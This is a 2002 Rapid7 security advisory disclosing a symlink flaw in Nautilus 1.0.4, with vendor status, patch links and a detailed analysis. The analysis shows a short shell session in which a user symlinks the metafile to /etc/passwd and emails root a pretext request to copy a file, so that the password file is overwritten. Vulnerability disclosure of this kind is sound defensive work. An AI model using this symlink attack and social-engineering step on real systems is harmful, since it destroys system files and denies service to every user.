_______________________________________________________________________
Rapid7, LLC Security Advisory
Visit http://www.rapid7.com to download NeXpose(tm), our
advanced vulnerability scanner.
_______________________________________________________________________
Rapid7 Advisory R7-0003: Nautilus Symlink Vulnerability
Published: 05/02/2002
Revision: 1.0
CVE ID: CAN-2002-0157
Bugtraq ID: 4373
1. Affected system(s):
KNOWN VULNERABLE:
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
2. Summary
Nautilus is a graphical shell for GNOME. It contains a vulnerability
which would allow a malicious user to mount a symlink attack to overwrite
another user's files.
3. Vendor status and information
Nautilus
Eazel, Inc.
http://nautilus.eazel.com/
The Nautilus team was notified on 03/26/2002.
4. Solution
Upgrade to the latest version of Nautilus, available at
http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate
patch:
RedHat 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm
i386:
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm
ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm
Slackware:
ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/
5. Detailed analysis
When copying files from one directory to another, Nautilus creates a
small (88+ bytes) XML file called '.nautilus-metafile.xml' in the target
directory. It does not check if a symlink with the same name already
exists there, and blindly writes XML data to it. The following example
shows how to cause a system-wide denial of service attack with this
vulnerability:
[jdog@imisshogs jdog]$ pwd
/home/jdog
[jdog@imisshogs jdog]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...snip...]
jdog:x:500:500::/home/jdog:/bin/bash
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Subject: Yo.
Could you please copy "creepy-in-new-york.doc" to my home directory
(/home/jdog)? Thanks.
- Joe
Cc:
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r--r-- 1 root root 13 Mar 24 18:09 creepy-in-new-york.doc
[jdog@imisshogs jdog]$ cat /etc/passwd
[jdog@imisshogs jdog]$
6. Contact Information
Rapid 7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid7, LLC is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid7, LLC. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid7, LLC.
